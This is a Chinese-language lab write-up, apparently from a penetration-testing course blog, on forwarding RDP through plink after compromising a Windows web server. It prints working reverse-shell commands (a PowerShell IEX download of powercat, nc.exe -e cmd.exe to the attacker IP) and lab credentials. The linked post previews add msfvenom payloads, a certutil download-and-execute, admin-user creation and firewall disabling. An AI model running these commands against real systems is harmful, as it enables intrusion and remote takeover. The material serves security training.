Windows 連接埠轉發 - Plink

-

 Windows 連接埠轉發 - Plink


儘管現在的 Windows 已經預設內建 SSH.exe,但實際環境中很多管理者會限制甚至移除

這時候尋求 PUTTY.exe 或是 PLINK 是另外一種好用的工具

環境說明,目標 Windows 對外僅有開放 Web Service 80 Port




第一步,透過 Web Service 入侵建立 Interactive Shell

攻擊機 192.168.45.160

靶機 192.168.201.64

rustscan 後,靶機對外僅有 80 Port





gobuster 看看入侵點吧

└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx

結果跳 Error : http://192.168.201.64/f606e083-b7c0-4b32-9a46-bcd18b686e9d => 200 (Length: 1917). To continue please exclude the status code or the length




那就 ignore 該 length 繼續,└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/ -t 150 -x .aspx --exclude-length 1917

沒掃到可利用的




網站有個子路徑 /umbraco





gobuster 加上子路徑再掃看看

└─$ gobuster -w "directory-list-2.3-medium.txt" dir -u http://192.168.201.64/umbraco -t 150 -x .aspx                       




掃完發現有個可以直接利用的 forms.aspx,可以直接下 command






之前有學過可以直接利用 powercat.ps1,powercat.ps1 查找與複製到 HTTP Server 根目錄




指令如下 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1');powercat -c 192.168.45.160 -p 4444 -e powershell"

remote shell 進來了,ipconfig 確認無誤接著 whoami 看一下是 IIS 的權限






另外也可以利用 nc.exe,kali 本機就有內建 nc.exe 可供使用

不知道在哪可以直接查找 find / -name nc.exe 2>/dev/null

nc.exe 位於 /usr/share/windows-resources/binaries/nc.exe




將 nc.exe COPY 到 kali home 目錄然後起 HTTP Server 等等下載 nc.exe payload 用

└─$ cp /usr/share/windows-resources/binaries/nc.exe .



接著用 powershell 接 wget 指令將 nc.exe 下載到 Windows 主機

指令 powershell wget -Uri http://192.168.45.160/nc.exe -OutFile C:\Windows\Temp\nc.exe




然後直接執行 nc.exe 連到攻擊機的 4444 Port

指令 : C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.160 4444

Remote Shell 進來了,一樣 whoami & ipconfig 看一下





測試了一下發現這一台 Windows 還真的沒有安裝(或是移除了) SSH.exe






那就改用好用的工具 plink.exe,kali 一樣有內建,一樣將檔案 COPY 到 Web Server 根目錄

└─$ find / -name plink.exe 2>/dev/null

路徑在 /usr/share/windows-resources/binaries/plink.exe
└─$ cp /usr/share/windows-resources/binaries/plink.exe .                                      





一樣下載到 C:\Windows\Temp\~ 底下

指令 : powershell wget -Uri http://192.168.45.160/plink.exe -OutFile C:\Windows\Temp\plink.exe





plink 指令與 OPENSSH 類似

指令 : cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw "kali" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.160

結果說 FATAL ERRORC:\windows\Temp>: Network error: Connection refused




看來是現在的 SSH 不是用高權限起的,所以輸入 └─$ sudo systemctl start ssh




再測試一次指令 :  cmd.exe /c echo y | .\plink.exe -ssh -l kali -pw "kali" -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.160,結果成功了


 



kali 的 9833 Port 起來了





通過 SSH Tunnel 對應到 Windows 機器的 3389 Port,如下圖





所以直接 xfreerdp kali 自己的 9833 Port,就可以開啟 Windows 的遠端桌面了

用之前拿到的帳號密碼,指令 xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833

可以看到 RDP 開起來了,顯示是 127.0.0.1:9833






直接拿桌面的 flag 吧





留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容